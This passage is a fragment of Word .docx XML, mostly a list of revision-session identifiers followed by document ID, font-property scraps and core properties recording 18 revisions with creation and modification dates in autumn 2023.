    <w:rsid w:val="008C2054"/>
    <w:rsid w:val="008D2466"/>
    <w:rsid w:val="008D3233"/>
    <w:rsid w:val="008E4165"/>
    <w:rsid w:val="008F18C8"/>
    <w:rsid w:val="008F2B4A"/>
    <w:rsid w:val="008F30FF"/>
    <w:rsid w:val="008F755A"/>
    <w:rsid w:val="008F76D3"/>
    <w:rsid w:val="00903595"/>
    <w:rsid w:val="00914F8A"/>
    <w:rsid w:val="00916E37"/>
    <w:rsid w:val="00917626"/>
    <w:rsid w:val="00921403"/>
    <w:rsid w:val="009303B4"/>
    <w:rsid w:val="00933DCA"/>
    <w:rsid w:val="0094184C"/>
    <w:rsid w:val="00950F42"/>
    <w:rsid w:val="00962C00"/>
    <w:rsid w:val="009662AA"/>
    <w:rsid w:val="00970BF8"/>
    <w:rsid w:val="009764B7"/>
    <w:rsid w:val="009F411A"/>
    <w:rsid w:val="00A01591"/>
    <w:rsid w:val="00A062A5"/>
    <w:rsid w:val="00A071F4"/>
    <w:rsid w:val="00A35B3A"/>
    <w:rsid w:val="00A44CF7"/>
    <w:rsid w:val="00A834AE"/>
    <w:rsid w:val="00A83ED9"/>
    <w:rsid w:val="00AA2AE9"/>
    <w:rsid w:val="00AF3753"/>
    <w:rsid w:val="00B026F1"/>
    <w:rsid w:val="00B03E11"/>
    <w:rsid w:val="00B112CB"/>
    <w:rsid w:val="00B2193E"/>
    <w:rsid w:val="00B33405"/>
    <w:rsid w:val="00B45D8B"/>
    <w:rsid w:val="00B47073"/>
    <w:rsid w:val="00B47E54"/>
    <w:rsid w:val="00B57949"/>
    <w:rsid w:val="00BA7C57"/>
    <w:rsid w:val="00BB5CA6"/>
    <w:rsid w:val="00BC1739"/>
    <w:rsid w:val="00BC3984"/>
    <w:rsid w:val="00BC7780"/>
    <w:rsid w:val="00BD3EE9"/>
    <w:rsid w:val="00BD4233"/>
    <w:rsid w:val="00BE0CC0"/>
    <w:rsid w:val="00BF2868"/>
    <w:rsid w:val="00C329BB"/>
    <w:rsid w:val="00C44177"/>
    <w:rsid w:val="00C44B26"/>
    <w:rsid w:val="00C4551B"/>
    <w:rsid w:val="00C46CCB"/>
    <w:rsid w:val="00C47C8F"/>
    <w:rsid w:val="00C61158"/>
    <w:rsid w:val="00C74415"/>
    <w:rsid w:val="00C84C96"/>
    <w:rsid w:val="00CB1CA7"/>
    <w:rsid w:val="00CB43ED"/>
    <w:rsid w:val="00CD3D3A"/>
    <w:rsid w:val="00CF4E92"/>
    <w:rsid w:val="00D46E1C"/>
    <w:rsid w:val="00D64007"/>
    <w:rsid w:val="00D70127"/>
    <w:rsid w:val="00D76CFA"/>
    <w:rsid w:val="00D82D12"/>
    <w:rsid w:val="00DA01A0"/>
    <w:rsid w:val="00DA1896"/>
    <w:rsid w:val="00DB3836"/>
    <w:rsid w:val="00DC6ED7"/>
    <w:rsid w:val="00DD59AE"/>
    <w:rsid w:val="00DF3E68"/>
    <w:rsid w:val="00E014E9"/>
    <w:rsid w:val="00E036C2"/>
    <w:rsid w:val="00E050CA"/>
    <w:rsid w:val="00E3082B"/>
    <w:rsid w:val="00E31496"/>
    <w:rsid w:val="00E323A2"/>
    <w:rsid w:val="00E35637"/>
    <w:rsid w:val="00E36C66"/>
    <w:rsid w:val="00E64623"/>
    <w:rsid w:val="00E71825"/>
    <w:rsid w:val="00E86B4D"/>
    <w:rsid w:val="00EA6346"/>
    <w:rsid w:val="00EA760C"/>
    <w:rsid w:val="00EC1C27"/>
    <w:rsid w:val="00EC37BE"/>
    <w:rsid w:val="00EF5628"/>
    <w:rsid w:val="00F24ADA"/>
    <w:rsid w:val="00F443AB"/>
    <w:rsid w:val="00F455FA"/>
    <w:rsid w:val="00F51D87"/>
    <w:rsid w:val="00F63D6F"/>
    <w:rsid w:val="00F748E3"/>
    <w:rsid w:val="00F9385F"/>
    <w:rsid w:val="00F950C9"/>
    <w:rsid w:val="00FB1ED0"/>
    <w:rsid w:val="00FB7477"/>
    <w:rsid w:val="00FB7C64"/>
    <w:rsid w:val="00FC69AB"/>
    <w:rsid w:val="00FD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8287A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CF664686-189A-45D2-B020-76389DB0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152E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F152E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57090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E26E8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4E26E8"/>
    <w:rPr>
      <w:rFonts w:ascii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18</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-14T11:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-09T09:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>